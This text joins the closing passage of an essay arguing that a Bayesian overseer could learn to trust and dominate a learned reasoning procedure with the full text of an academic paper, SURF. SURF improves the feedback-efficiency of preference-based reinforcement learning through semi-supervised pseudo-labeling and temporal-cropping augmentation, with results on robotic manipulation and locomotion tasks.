Instead, I think a universal reasoner needs to be able to infer the efficacy of this reasoning procedure from its empirical success. It’s relatively easy for a Bayesian to learn the regularity “*f* makes good predictions.” Recovering the rest of the matrix A, and learning how to interpret and whether to trust them, is the hard part.
This is going to require the same kind of bridging/identification we discussed in the last section. Let’s write X(A) for the set of beliefs about the world implied by the “intended” identification. Searching over possible identifications to find X (or something like it) is the only way we can ever relate the rows of A to the quantities X(*i*). Again, we can hope that it isn’t much harder than finding the original reasoning procedure.
I think that a sufficiently sophisticated Bayesian would probably be able to learn to trust X(A):
* If *f* is performing well enough that we think it’s more likely to be right in the future, then the Bayesian is going to end believing some claim like “the predictions of *f* are good” (since it explains the data so well).
* This is a complicated statement, and without some kind of explanation this claim has a low prior probability (roughly decaying with the complexity of *f)*. The Bayesian is motivated to find an explanation with higher prior probability.
* The correspondence X can explain the constraints on the matrix A, in terms of facts that we already know about the world. This explanation may end up being simpler (or at least higher prior) than a direct enumeration of the constraints on A — I hope (and think it’s plausible) that this happens iff we’d actually believe on reflection that X(A) captures reality.
(To the extent that we are uncertain and think A’s beliefs have a non-negligible chance of capturing reality, then hopefully we can capture that by the same mechanism by ending up with a non-degenerate posterior.)
* Now the Bayesian is faced with at least two kinds of explanations:
(a) “If you use the constraints implied by correspondence X(A) + positive semidefiniteness, and then optimize log det, you get a matrix A for which X(A) makes good predictions,”
(b) “The actual situation in the real world is described by positive semi-definite matrices with higher log determinant (under the correspondence X).”
* Explanation (b) is explaining two things at once: both why the optimization done by *f* respects the constraints on our beliefs, and why that optimization leads to good predictions. Hopefully this is simpler than making two separate bridging claims, one which explains *f* as respecting the constraints implied by X, and one which claims that *f* makes good predictions. Ideally, this 2-for-1 that favors (b) exactly mirrors the underlying reasoning that leads us to actually believe that X(A) is correct, rather than resembling what we know about reality and making good predictions “by coincidence.”
This is a pretty speculative discussion — it’s not very careful, and it’s hard to make it careful in part because I don’t have a formalization of Bayesian reasoning that can even really be applied to this setting. But it seems to match my intuitions about what reasonable Bayesian reasoning “should” do, which gives me a lot more optimism that a careful Bayesian would be able to epistemically dominate **C**.
**Deliberation and self-improvement**
-------------------------------------
Often we expect the computation **C** to have accurate beliefs because it uses a strategy that appears to work in practice — the last 3 examples have discussed that case. But there are other reasons to trust a computation.
For example, humans often write code and trust it (to some extent) even without extensive empirical testing — instead, we have a reason to think it will work, and need only modest testing to make sure that we haven’t made an error in our implementation or reasoning. If I write an automated mathematician that works by finding proofs that pass a proof checker, I don’t expect it to be correct because of the empirical record (Empirical data backs up some key assumptions, but isn’t being used to directly establishing the correctness of the method.)
Likewise, if we train a powerful agent, that agent might initially use strategies that work well in training, but over time it might use learned reasoning to identify other promising strategies and use those. Reasoning might allow it to totally skip empirical testing, or to adopt the method after much less testing than would have been necessary without the reasoning.
To dominate the beliefs produced by such reasoning, we can’t directly appeal to the kind of statistical inference made in the previous section. But in these cases I think we have access to an even more direct strategy.
Concretely, consider the situation where **C** contains a process *f* that designs a new reasoning process *g*. Then:
* From the outside, we trust *g* because we trust *f* and it trusts *g.*
* An otherwise-universal reasoner **A** will dominate *f*’s beliefs, and in particular if *f* is justified in thinking that *g* will work then **A** will believe that and understand why.
* Once we understand *f’*s beliefs, dominating *g* is essentially another instance of the original ascription universality problem, but now from a slightly stronger epistemic state that involves both what 𝔼 knows and what *f* knows. So unless our original approach to universality was tightly wedded to details of 𝔼, we can probably dominate *g*.
At the end of the day we’d like to put all of this together into a tight argument for universality, which will need to incorporate both statistical arguments and this kind of dynamic. But I’m tentatively optimistic about achieving universality in light of the prospect of agents designing new agents, and am much more worried about the kind of opaque computations that “just work” described in the last few sections. |
bcb6fda8-384d-46cf-80ad-02caa17b4a61 | StampyAI/alignment-research-dataset/arxiv | Arxiv | SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning.
1 Introduction
---------------
Reward function plays a crucial role in reinforcement learning (RL) to convey complex objectives to agents. For various applications, where we can design an informative reward function, RL with deep neural networks has been used to solve a variety of sequential decision-making problems, including board games (alphago; alphazero), video games (mnih2015human; berner2019dota; alphastar), autonomous control (trpo; bellemare2020autonomous), and robotic manipulation (policy-search; robot-rl; qtopt; andrychowicz2020learning).
However, there are several issues in reward engineering.
First, designing a suitable reward function requires more human effort as the tasks become more complex.
For example, defining a reward function for book summarization (wu2021recursively) is non-trivial because it is hard to quantify the quality of summarization in a scale value.
Also, it has been observed that RL agents could achieve high returns by discovering undesirable shortcuts if the hand-engineered reward does fully specify the desired task (amodei2016concrete; hadfield2017inverse; pebble).
Furthermore, there are various domains, where a single ground-truth function does not exist, and thus personalization is required by modeling different reward functions based on the user’s preference.
Preference-based RL (akrour2011preference; preference\_drl; ibarz2018preference\_demo; pebble) provides an attractive alternative to avoid reward engineering.
Instead of assuming a hand-engineered reward function,
a (human) teacher provides preferences between the two agent behaviors,
and an agent learns how to show the desired behavior by learning a reward function, which is consistent with the teacher’s preferences.
Recent progress of preference-based RL has shown that
the teacher can guide the agent to perform novel behaviors (preference\_drl; stiennon2020learning; wu2021recursively), and
mitigate the effects of reward exploitation (pebble).
However, existing preference-based approaches often suffer from expensive labeling costs, and this makes it hard to apply preference-based RL to various applications.
Meanwhile, recent state-of-the-art system in computer vision,
the label-efficiency problem has been successfully addressed through semi-supervised learning (SSL) approaches (berthelot2019mixmatch; berthelot2020remixmatch; sohn2020fixmatch; chen2020big).
By leveraging unlabeled dataset,
SSL methods have improved the performance with low cost.
Data augmentation also plays a significant role in improving the performance of supervised learning methods (cubuk2018autoaugment; cubuk2019randaugment).
By using multiple augmented views of the same data as input,
the performance has been improved by learning augmentation-invariant representations.
Inspired by the impact of semi-supervised learning and data augmentation,
we present
SURF: a Semi-sUpervised Reward learning with data augmentation for Feedback-efficient preference-based RL.
To be specific, SURF consists of the following key ingredients:
1. [leftmargin=8mm]
2. Pseudo-labeling (lee2013pseudo; sohn2020fixmatch):
We leverage unlabeled data by utilizing the artificial labels generated by learned preference predictor, which makes the reward function produce a confident prediction (see Figure [(a)a](#S2.F1.sf1 "(a) ‣ Figure 3 ‣ 2 Related work ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")).
We remark that such a SSL approach is particularly attractive in our setup as an unlimited number of unlabeled data can be obtained with no additional cost, i.e., from past experiences stored in the buffer.
3. Temporal cropping augmentation:
We generate slightly shifted or resized behaviors, which are expected to have the same preferences from a teacher, and utilize them for reward learning (see Figure [(b)b](#S2.F2.sf2 "(b) ‣ Figure 3 ‣ 2 Related work ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")).
Our data augmentation technique enhances the feedback-efficiency
by enforcing consistencies (xie2019unsupervised; berthelot2020remixmatch; sohn2020fixmatch) to the reward function.
We remark that SURF is not a naïve application of these two techniques,
but a novel combination of semi-supervised learning and the proposed data augmentation, which has not been considered or evaluated in the context of the preference-based RL.
Our experiments demonstrate that
SURF significantly improves the preference-based RL method (pebble) on complex locomotion and robotic manipulation tasks from DeepMind Control Suite (dmcontrol\_old; dmcontrol\_new) and Meta-world (yu2020meta), in terms of feedback-efficiency.
In particular, our framework could make RL agents achieve ∼100% of success rate on complex robotic manipulation task using only a few hundred preference queries, while its baseline method only achieves ∼50% of the success rate under the same condition (see Figure [10](#S5.F10 "Figure 10 ‣ 5.1 Setups ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")).
Furthermore, we show that SURF can improve the performance of preference-based RL algorithms when we operate on high-dimensional and partially-observable inputs.
2 Related work
---------------
Preference-based RL.
In the preference-based RL framework,
a (human) supervisor provides preferences between the two agent behaviors
and the agent uses this feedback to perform the task (preference\_drl; ibarz2018preference\_demo; leike2018scalable; stiennon2020learning; wu2021recursively; pebble; lee2021bpref).
Since this approach is only feasible if the feedback is practical for a human to provide,
several strategies have been studied in the literature.
ibarz2018preference\_demo initialized the agent’s policy with imitation learning from the expert demonstrations,
while pebble utilized unsupervised pre-training for policy initialization.
Several sampling schemes (sadigh2017active; biyik2018batch; biyik2020active) to select informative queries also have been adopted for improving the feedback-efficiency.
Our approach differs in that we
utilize unlabeled samples for reward learning, and also provide
a novel data augmentation technique for the agent behaviors.
Data augmentation for RL.
In the context of RL,
data augmentation has been widely investigated for improving data-efficiency (srinivas2020curl; yarats2021image), or RL generalization (cobbe2019quantifying; lee2019network).
For example, RAD (laskin2020reinforcement) demonstrated that data augmentation, such as random crop,
can improve both data-efficiency and generalization of RL algorithms.
While these methods are known to be beneficial to learn policy in the standard RL setup,
they have not been tested for learning *rewards*.
To the best of our knowledge, we present the first
data augmentation method specially designed for learning reward function.
Semi-supervised learning.
The goal of
semi-supervised learning (SSL) is to leveraging unlabeled samples to improve a model’s
performance when the amount of labeled samples are limited.
In an attempt to leverage the information in the unlabeled dataset, a number of techniques have been proposed, e.g., entropy minimization (grandvalet2005semi; lee2013pseudo) and consistency regularization (sajjadi2016regularization; miyato2018virtual; xie2019unsupervised; sohn2020fixmatch).
Recently, the combination of these two approaches have shown state-of-the-art performance in benchmarks, e.g., MixMatch (berthelot2019mixmatch), and ReMixMatch (berthelot2020remixmatch), when used with advanced
data augmentation techniques (zhang2017mixup; cubuk2019randaugment).
Specifically,
FixMatch (sohn2020fixmatch) revisits pseudo-labeling technique
and demonstrates that
joint usage of pseudo-labels and consistency regularization achieves remarkable performance due to its simplicity.
| | |
| --- | --- |
| Pseudo-labeling
(a) Pseudo-labeling
| Temporal cropping
(b) Temporal cropping
|
Figure 3: Overview of SURF.
(a) We leverage unlabeled experiences by generating pseudo-labels ˆy from the preference predictor Pψ in ([1](#S3.E1 "(1) ‣ 3 Preliminaries ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")).
To mitigate the negative effects from this semi-supervised learning,
we only utilize pseudo-labels when the confidence of the predictor is higher than threshold τ.
(b) Given two segments (σ0,σ1), we generate augmented segments (ˆσ0,ˆσ1) by cropping the subsequence from each segment.
3 Preliminaries
----------------
Reinforcement learning (RL) is a framework where
an agent interacts with an environment in discrete time (sutton2018reinforcement).
At each timestep t, the agent receives a state st from the environment and chooses an action at based on its policy π(at|st).
In conventional RL framework,
the environment gives a reward r(st,at)
and the agent transitions to the next state st+1.
The return Rt=∑∞k=0γkr(st+k,at+k) is defined as discounted cumulative sum of the reward
with discount factor γ∈[0,1).
The goal of the agent is to learn a policy that maximizes the expected return.
Preference-based reinforcement learning.
In this paper,
we consider a preference-based RL framework, which does not assume the existence of hand-engineered reward.
Instead, a (human) teacher provides preferences between the agent’s behaviors
and the agent uses this feedback to perform the task (preference\_drl; ibarz2018preference\_demo; leike2018scalable; stiennon2020learning; pebble; lee2021bpref; wu2021recursively) by learning a reward function, which is consistent with the observed preferences.
We formulate a reward learning problem as a supervised learning problem (wilson2012bayesian; preference\_drl).
Formally, a segment σ is a sequence of observations and actions {(sk,ak),...,(sk+H−1,ak+H−1)}.
Given a pair of segments (σ0,σ1),
a teacher gives a feedback indicating which segment is preferred, i.e.,
y∈{0,1,0.5}, where 1 indicates σ1≻σ0 , 0 indicates σ0≻σ1, and 0.5 implies an equally preferable case.
Each feedback is stored in a dataset D as a triple (σ0,σ1,y).
Then,
we model a preference predictor using the reward function ˆrψ following the Bradley-Terry model (bradley1952rank):
| | | | |
| --- | --- | --- | --- |
| | Pψ[σ1≻σ0]=exp(∑tˆrψ(s1t,a1t))∑i∈{0,1}exp(∑tˆrψ(sit,ait)), | | (1) |
where σi≻σj denotes the event that segment i is preferable to segment j.
The underlying assumption of this model is that
the teacher’s probability of preferring a segment depends exponentially on the accumulated sum of the reward over the segment.
The reward model is trained through supervised learning with teacher’s preferences.
Specifically, given a dataset of preferences D,
the reward function is updated by minimizing the binary cross-entropy loss:
| | | | |
| --- | --- | --- | --- |
| | LCE=E(σ0,σ1,y)∼D[LReward]=−E(σ0,σ1,y)∼D[ | (1−y)logPψ[σ0≻σ1]+ylogPψ[σ1≻σ0]]. | |
The reward function ˆrψ is usually optimized only using labels from real human, which are expensive to obtain in practice. Instead, we propose a simple yet effective method based on semi-supervised learning and data augmentation to improve the feedback-efficiency of preference-based learning.
0: Hyperparameters: unlabeled batch ratio μ, threshold parameter τ, and loss weight λ
0: Set of collected labeled data Dl, and unlabeled data Du
1: for each gradient step do
2: Sample labeled batch {(σ0l,σ1l,y)(i)}Bi=1∼Dl
3: Sample unlabeled batch {(σ0u,σ1u)(j)}μBj=1∼Du
4: // Data augmentation for labeled data
5: for i in 1…B do
6: (ˆσ0l,ˆσ1l)(i)←%TDA((σ0l,σ1l)(i)) in Algorithm [2](#alg2 "Algorithm 2 ‣ 4.2 Temporal data augmentation for reward learning ‣ 4 SURF ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")
7: end for
8: // Pseudo-labeling and data augmentation for unlabeled data
9: for j in 1…μB do
10: Predict pseudo-labels ˆy((σ0u,σ1u)(j))
11: (ˆσ0u,ˆσ1u)(j)←%TDA((σ0u,σ1u)(j)) in Algorithm [2](#alg2 "Algorithm 2 ‣ 4.2 Temporal data augmentation for reward learning ‣ 4 SURF ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")
12: end for
13: Optimize LSSL ([3](#S4.E3 "(3) ‣ 4.1 Semi-supervised reward learning ‣ 4 SURF ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")) with respect to ψ
14: end for
Algorithm 1 SURF
4 Surf
-------
In this section, we present
SURF: a Semi-sUpervised Reward learning with data augmentation for Feedback-efficient preference-based RL,
that can be used in conjunction with any existing preference-based RL methods.
Our main idea is to leverage a large number of unlabeled samples collected from environments for reward learning, by inferring pseudo-labels.
To further increase the effective number of training samples, we propose a new data augmentation that temporally crops the subsequence of the agent behaviors.
The full procedure of our unified framework in Algorithm [1](#alg1 "Algorithm 1 ‣ 3 Preliminaries ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") (See Figure [3](#S2.F3 "Figure 3 ‣ 2 Related work ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") for the overview of our method).
###
4.1 Semi-supervised reward learning
To improve the feedback efficiency,
we propose a semi-supervised learning (SSL) method for leveraging unlabeled experiences in the buffer for reward learning.
In addition to a *labeled dataset* Dl={(σ0l,σ1l,y)(i)}Nli=1,
we utilize an *unlabeled dataset* Du={(σ0u,σ1u)(i)}Nui=1 to optimize the reward model rψ.111The unlabeled dataset Du is not constrained to a fixed size since one can collect those unlabeled samples flexibly by sampling arbitrary pairs of experiences from the buffer.
Specifically,
we generate the artificial labels ˆy by *pseudo-labeling* (lee2013pseudo; sohn2020fixmatch) for the unlabeled dataset Du.
We infer a preference ˆy for an unlabeled segment pair (σ0u,σ1u) as a class with higher probability as follows:
| | | | |
| --- | --- | --- | --- |
| | ˆy(σ0u,σ1u)={0,%
if Pψ[σ0u≻σ1u]>0.51,otherwise. | | (2) |
By generating labels from the prediction model,
we can obtain free supervision for optimizing our reward model.
However, pseudo-labels from low-confidence predictions can be inaccurate,
and such noisy feedback can significantly degrade the peformance of preference-based learning (lee2021bpref).
To filter out inaccurate pseudo-labels,
we only use unlabeled samples for training when the confidence of the predictor is higher than a pre-defined threshold (rosenberg2005semi).
Then the reward model rψ is optimized by minimizing the following objective:
| | | | | |
| --- | --- | --- | --- | --- |
| | LSSL=E(σ0l,σ1l,y)∼Dl,(σ0u,σ1u)∼Du | [LReward(σ0l,σ1l,y)+λ⋅LReward(σ0u,σ1u,ˆy)⋅1(Pψ[σk∗u≻σ1−k∗u]>τ)], | | (3) |
where k∗=argmaxj∈{0,1}ˆy(j) is an index of the preferred segment from the pseudo-label,
λ is a hyperparameter that balances the losses,
and τ is a confidence threshold.
Training with the pseudo-labels encourages the model to output more confident predictions on unlabeled samples.
This can be seen as a form of entropy minimization (grandvalet2005semi), which is essential to the success of recent SSL methods (berthelot2019mixmatch; berthelot2020remixmatch).
The entropy minimization can improve the reward learning by forcing the preference predictor to be low-entropy (i.e., high-confidence) on unlabeled samples.
During training,
we sample a larger minibatch of unlabeled samples than labeled ones by a factor of μ following (sohn2020fixmatch),
since unlabeled samples with low confidence are dropped within minibatch.
###
4.2 Temporal data augmentation for reward learning
To further improve the feedback-efficiency in preference-based RL,
we propose a new data augmentation technique specially designed for reward learning.
Specifically,
for a given two segments and preference (σ0,σ1,y),
we generate augmented segments (ˆσ0,ˆσ1,y) by cropping the subsequence from each segment (see Algorithm [2](#alg2 "Algorithm 2 ‣ 4.2 Temporal data augmentation for reward learning ‣ 4 SURF ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") for more details).222The length of the cropped segment is generated randomly across the batch but the same for segment pairs, because the preference predictor uses the accumulated sum of the reward over time.
Then, we utilize augmented samples (ˆσ0,ˆσ1) to optimize the cross-entropy loss in ([3](#S4.E3 "(3) ‣ 4.1 Semi-supervised reward learning ‣ 4 SURF ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")).
The intuition behind the augmentation is that
for a given pair of behavior clips,
the human teacher may keep their relative preferences for
slightly shifted or resized versions of them.
In the context of SSL,
data augmentation
is also related to
consistency regularization (xie2019unsupervised; sohn2020fixmatch) approaches
that train the model to output similar predictions on augmented versions of the same sample.
Namely, this *temporal cropping* method enables our framework can also enjoy the benefits of consistency regularization.
0: Minimum and maximum length Hmin and Hmax, respectively, for cropping
0: Pair of segments (σ0,σ1) with length H
1: σ0={(s00,a00),...,(s0H−1,a0H−1)}
2: σ1={(s10,a10),...,(s1H−1,a1H−1)}
3: Sample H′ from a range of [Hmin,Hmax]
4: Sample k0, k1 from a range of [0,H−H′]
5: // Randomly crop a sequence with length H′
6: ˆσ0←{(s0k0,a0k0),...,(s0k0+H′−1,a0k0+H′−1)}
7: ˆσ1←{(s1k1,a1k1),...,(s1k1+H′−1,a1k1+H′−1)}
8: Return (ˆσ0,ˆσ1)
Algorithm 2 TDA: Temporal data augmentation for reward learning
5 Experiments
--------------
We design our experiments to investigate the following:
1. [leftmargin=8mm]
2. How does SURF improve the existing preference-based RL method in terms of feedback efficiency?
3. What is the contribution of each of the proposed components in SURF?
4. How does the number of queries affect the performance of SURF?
5. Is temporal cropping better than existing state-based data augmentation methods in terms of feedback efficiency?
6. Can SURF improve the performance of preference-based RL methods when we operate on high-dimensional and partially observable inputs?
###
5.1 Setups
We evaluate SURF on several complex robotic manipulation and locomotion tasks
from Meta-world (yu2020meta) and DeepMind Control Suite (DMControl; dmcontrol\_old; dmcontrol\_new), respectively.
Similar to prior works (preference\_drl; pebble; lee2021bpref), in order to systemically evaluate the performance, we consider a scripted teacher that provides preferences between two trajectory segments to the agent according to the underlying reward function.333While utilizing preferences from the human teacher is ideal, this makes hard to evaluate algorithms quantitatively and quickly.
Since preferences of the scripted teacher exactly reflects ground truth reward of the environment,
one can evaluate the algorithms quantitatively by measuring the true return.
We remark that SURF can be combined with any preference-based RL algorithms by replacing the reward learning procedure of its backbone method.
In our experiments, we choose state-of-the-art approach, PEBBLE (pebble), as our backbone algorithm.
Since PEBBLE utilizes SAC (sac) algorithm to learn the policy,
we also compare to SAC using the ground truth reward directly, as an upper bound of PEBBLE and our method.
We note that our goal is not to outperform SAC,
but rather to perform closely using as few preference queries as possible.
| | | | | | |
| --- | --- | --- | --- | --- | --- |
| Hammer
(a) Hammer
| Door Open
(b) Door Open
| Button Press
(c) Button Press
| Sweep Into
(d) Sweep Into
| Drawer Open
(e) Drawer Open
| Window Open
(f) Window Open
|
Figure 10: Learning curves on robotic manipulation tasks as measured on the success rate. The solid line and shaded regions represent the mean and standard deviation, respectively, across five runs.
Implementation details of SURF.
For all experiments, we use the same hyperparameters
used by the original SAC and PEBBLE algorithms,
such as learning rate of neural networks and frequency of the feedback session.
For query selection strategy,
we use the disagreement-based sampling scheme,
which selects queries with high uncertainty, i.e., ensemble disagreement (see Appendix [B](#A2 "Appendix B Experimental details ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") for more details).
At each feedback session, we sample unlabeled samples as 10 times of labeled ones by uniform sampling scheme, unless otherwise noted.
Although we only use such amount of unlabeled samples for time-efficient training, we note that one can utilize much more unlabeled samples as needed.
For the hyperparameters of SURF, we fix the loss weight λ=1, and unlabeled batch ratio μ=4 for all experiments,
and use threshold parameter τ=0.999 for Window Open, Sweep Into, Cheetah tasks, and τ=0.99 for the others.
We provide more experimental details in Appendix [B](#A2 "Appendix B Experimental details ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning").
Extension to visual control tasks.
To further demonstrate the effectiveness of our method, we also provide experimental results on visual control tasks, where each observation is an image of 84×84×3.
Specifically, we choose DrQ-v2 (yarats2021drqv2), a state-of-the-art pixel-based RL approach on DMControl, as a backbone algorithm for PEBBLE and SURF.
Similar to experiments with state-based inputs, we also compare to DrQ-v2 using ground truth reward as an upper bound.
###
5.2 Benchmark tasks with scripted teachers
Meta-world experiments.
Meta-world consists of 50 robotic manipulation tasks, which are designed for learning diverse manipulation skills.
We consider six tasks from Meta-world,
to investigate how SURF improves a preference-based learning method
on a range of complex robotic manipulation tasks (see Figure [33](#A2.F33 "Figure 33 ‣ Appendix B Experimental details ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") in Appendix [B](#A2 "Appendix B Experimental details ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")).
Figure [10](#S5.F10 "Figure 10 ‣ 5.1 Setups ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") shows the learning curves of SAC, PEBBLE and SURF (which combined with PEBBLE) on the manipulation tasks.
In each task, PEBBLE and SURF utilize the same number of preference queries for fair comparison.
As shown in the figure,
SURF significantly improves the performance of PEBBLE given the same number of feedback on all tasks we considered,
and
matches the performance of SAC using the ground truth reward on four tasks.
For example, we find that when using 400 preference queries, SURF (red) reaches the same performance as SAC (green) while PEBBLE (blue) is far behind to SAC on Window Open task.
We also observe that SURF achieves similar performance to PEBBLE with much less labels.
For example, to achieve comparable performance to SAC on Window Open task, PEBBLE needs 2,500 queries (reported in (pebble)), requiring about 6 times more queries than SURF.
These results demonstrate that SURF significantly reduces the feedback required to solve complex tasks.
DMControl experiments.
For locomotion tasks, we choose three complex environments from DMControl: Walker-walk, Cheetah-run, and Quadruped-walk.
Figure [14](#S5.F14 "Figure 14 ‣ 5.2 Benchmark tasks with scripted teachers ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") shows the learning curves of the algorithms with same number of queries.
We find that using a budget of 100 or 1,000 queries (which takes only few human minutes),
SURF (red) could significantly improve the performance of PEBBLE (blue).
These results again demonstrate that
that SURF improves the feedback-efficiency of preference-based RL methods on a variety of complex tasks.
| | | |
| --- | --- | --- |
| Walker
(a) Walker
| Cheetah
(b) Cheetah
| Quadruped
(c) Quadruped
|
Figure 14: Learning curves on locomotion tasks as measured on the ground truth reward. The solid line and shaded regions represent the mean and standard deviation, respectively, across five runs.
###
5.3 Ablation study
Component analysis.
To evaluate the effect of each technique in SURF individually,
we incrementally apply semi-supervised learning (SSL) and temporal cropping (TC) to our backbone algorithm, PEBBLE.
Figure [(a)a](#S5.F15.sf1 "(a) ‣ Figure 18 ‣ 5.3 Ablation study ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") shows the learning curves of SURF on Walker-walk task with 100 queries.
We observe that leveraging unlabeled samples via pseudo-labeling (green) significantly improves PEBBLE, in terms of both sample-efficiency and asymptotic performance, while standard PEBBLE (blue) suffers from lack of supervision.
In addition,
both supervised (blue) and semi-supervised (green) reward learning are further improved by additionally utilizing temporal cropping (purple and red, respectively).
This implies that our augmentation method improves label-efficiency by generating diverse behaviors share the same labels.
Also, the results show that the key components of SURF are both effective, and their combination is essential to our method’s success.
We also provide extensive ablation studies on Meta-world, which show similar tendencies in Appendix [C](#A3 "Appendix C Additional experimental results ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning").
| | | |
| --- | --- | --- |
| Contributions of each component
(a) Contributions of each component
| Query size
(b) Query size
| Effects of data augmentation
(c) Effects of data augmentation
|
Figure 18: Ablation study on Walker-walk.
(a) Contribution of each technique in SURF, i.e., semi-supervised learning (SSL) and temporal cropping (TC).
(b) Effects of query size.
(c) Comparison of augmentation methods.
The results show the mean and standard deviation averaged over five runs.
| | | |
| --- | --- | --- |
| Unlabeled batch ratio
(a) Unlabeled batch ratio μ
| Threshold parameter
(b) Threshold parameter τ
| Loss weight
(c) Loss weight λ
|
Figure 22: Hyperparameter analysis on Walker-walk using 100 preference queries.
The results show the mean and standard deviation averaged over five runs.
Effects of query size.
To investigate how the number of queries affects the performance of SURF, we evaluate the performance of SURF with a varying number of queries N∈{50,100,200,400}.
As shown in Figure [(b)b](#S5.F16.sf2 "(b) ‣ Figure 18 ‣ 5.3 Ablation study ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning"), SURF (solid lines) consistently improves the performance of PEBBLE (dotted lines) across a wide range of query sizes.
The gain from SURF becomes even more significant in the extreme label-scarce scenarios, i.e., N∈{50,100}.
Comparison to other augmentation for state-based inputs.
To demonstrate that temporal cropping can
enduce significant improvements for reward learning,
we compare our method to other augmentation methods for state-based inputs.
We consider random amplitude scaling (RAS) and adding Gaussian noise (GN) proposed in laskin2020reinforcement as our baselines.
RAS multiplies an uniform random variable z to the state, i.e., ˆs=s⋅z, where z∼Unif[α,β], and
GN adds a multivariate Gaussian random variable z to the state, i.e., ˆs=s+z, where z∼N(0,I).
As proposed in laskin2020reinforcement, we apply these methods consistently along the time dimension, and choose the parameters for RAS as α=0.8, β=1.2.
Specifically, for a given segment σ=({(sk,ak),...,(sk+H−1,ak+H−1)}), we obtain the augmented sample ˆσ by perturbing each state along the segment, i.e.,
ˆσ=({(ˆsk,ak),...,(ˆsk+H−1,ak+H−1)}).
In Figure [(c)c](#S5.F17.sf3 "(c) ‣ Figure 18 ‣ 5.3 Ablation study ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning"), we plot the learning curves of PEBBLE with various data augmentations on Walker-walk task with 100 queries.
We observe that
RAS improves the performance of PEBBLE, but
temporal cropping still outperforms these two methods.
GN degrades the performance, possibly due to the noisy inputs.
Since RAS is an orthogonal approach to augment state-based inputs, one can integrate them with our method to further improve the performance.
This may be an interesting future direction for addressing feedback-efficiency in preference-based RL (see Appendix [C](#A3 "Appendix C Additional experimental results ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning")).
Effects of hyperparameters of SURF.
We investigate how the hyperparameters of SURF affect the performance of preference-based RL.
In Figure [22](#S5.F22 "Figure 22 ‣ 5.3 Ablation study ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning"), we plot the learning curve of SURF with different set of hyperparameters: (a) unlabeled batch ratio μ∈{1,2,4,7}, (b) threshold parameter τ∈{0.95,0.97,0.99,0.999}, and (c) loss weight λ∈{0.1,0.5,1,2}, respectively.
First, we observe that
SURF is quite robust on μ, but the performance slightly drops with a large batch size μ=7.
We expect that this is because a large batch size makes the reward model overfit to unlabeled data.
We also observe that SURF is also robust on the threshold τ, except for the smallest value of 0.95. Because there are only two classes in tasks, the optimal threshold could larger than the value typically used in previous SSL methods (sohn2020fixmatch), i.e., 0.95.
In the case of the loss weight λ, tuning this parameter brings more improvements than other hyperparameters.
Although we use a simple choice, i.e., λ=1, in our experiments, more tuning λ would further improve the performance of our method.
###
5.4 Experiments on visual control tasks
Figure [26](#S5.F26 "Figure 26 ‣ 5.4 Experiments on visual control tasks ‣ 5 Experiments ‣ SURF: Semi-supervised Reward Learning with Data Augmentation for Feedback-efficient Preference-based Reinforcement Learning") shows the learning curve of DrQ-v2, PEBBLE, and SURF with the same number of queries.
We observe that SURF (red) significantly improves the performance of PEBBLE (blue).
In particular, SURF achieves comparable performance to DrQ-v2 (green) with ground truth reward in Walker-walk, only using a budget of 200 queries.
These results demonstrate that SURF could also improve the performance with image observations.
We remark that our temporal cropping augmentation can be combined with any existing image augmentation methods,
which would be an interesting future direction to explore.
| | | |
| --- | --- | --- |
| Walker
(a) Walker
| Cheetah
(b) Cheetah
| Quadruped
(c) Quadruped
|
Figure 26: Learning curves on locomotion tasks with pixel-based inputs as measured on the ground truth reward. The solid line and shaded regions represent the mean and standard deviation, respectively, across five runs.
6 Discussion
-------------
In this work, we present SURF, a semi-supervised reward learning algorithm with data augmentation for preference-based RL.
First, in order to utilize an unlimited number of unlabeled data,
we utilize pseudo-labeling on confident samples.
Also, to enforce consistencies to the reward function,
we propose a new data augmentation method called temporal cropping.
Our experiments demonstrate that SURF significantly improves feedback-efficiency of current state-of-the-art method on a variety of complex robotic manipulation and locomotion tasks.
We believe that SURF can scale up deep RL to more diverse and challenging domains by making preference-based learning more tractable.
An interesting future direction is to extend state-based inputs to
partially-observable or high-dimensional inputs, e.g., pixels.
